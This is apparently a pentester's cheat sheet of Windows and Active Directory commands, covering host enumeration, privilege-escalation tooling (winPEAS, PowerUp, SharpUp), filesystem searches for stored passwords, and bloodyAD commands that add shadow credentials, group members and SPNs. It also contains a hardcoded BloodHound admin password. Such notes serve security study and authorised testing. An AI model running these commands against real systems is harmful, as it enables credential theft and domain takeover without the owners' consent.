whoami # Current user
whoami /priv # Privileges of current user
whoami /groups # Groups the user belongs to
hostname # Machine hostname
systeminfo # OS version, patches, architecture
echo %USERDOMAIN% # Current domain
echo %LOGONSERVER% # Domain controller
wmic product get name,version # Installed software
wmic qfe get Caption,Description,HotFixID,InstalledOn # Shows installed patches
Users & Groups
net user # List local users
net user <username> # Detailed user info
net localgroup # List local groups
net localgroup administrators # Check admin group members
tasklist # Running processes
tasklist /svc # Processes with associated services
sc query # List services
sc qc <service> # Service configuration
wmic service list brief # Alternative service listing
schtasks /query /fo LIST /v # Shows scheduled tasks
Interesting Files
dir /s /b C:\*.txt
dir /s /b C:\*.config
dir /s /b C:\*.xml
dir /s /b C:\*.ini
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /spin "password" *.*
dir /s *pass* == *cred* == *vnc*
dir C:\ # List root directories
icacls C:\path\file # Check file permissions
icacls C:\ /T | findstr "Everyone:(F)"
Active Directory
Basic Enumeration
net user /domain #Enumerate Domain Users
net user <USER> /domain #Insepct Domain User
net group /domain #Enumerate Domain Groups
net group <GROUP> /domain #Enumerate Members of Groups
Tools
Winpeas
winPEAS.exe
Seatbelt
Seatbelt.exe all # Run all checks
# Run specific checks
Seatbelt.exe system
Seatbelt.exe user
Seatbelt.exe processes
Seatbelt.exe services
PowerUp & SharpUp (C# Version)
Import-Module .\PowerUp.ps1
Invoke-AllChecks # Run all checks
# Run specific checks
Invoke-ServiceAbuse
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService
SharpUp.exe services
SharpUp.exe registry
SharpUp.exe tasks
SharpUp.exe audit
./bloodhound-cli up
./bloodhound-cli down
http://localhost:8080/ui/explore
You can log in as `admin` with this password: z7B6XcwN9X5FJYO8l95bxEUSCXpKBTIP
Other
BloodyAD
bloodyAD -H <IP> -d <FQDN> -u 'USER' -p 'PASS'
add shadowCredentials <USER>
add groupMember '<GROUP>' <USER>
set object ALFRED servicePrincipleName -v 'http/fun'
set owner <USER> <-u user>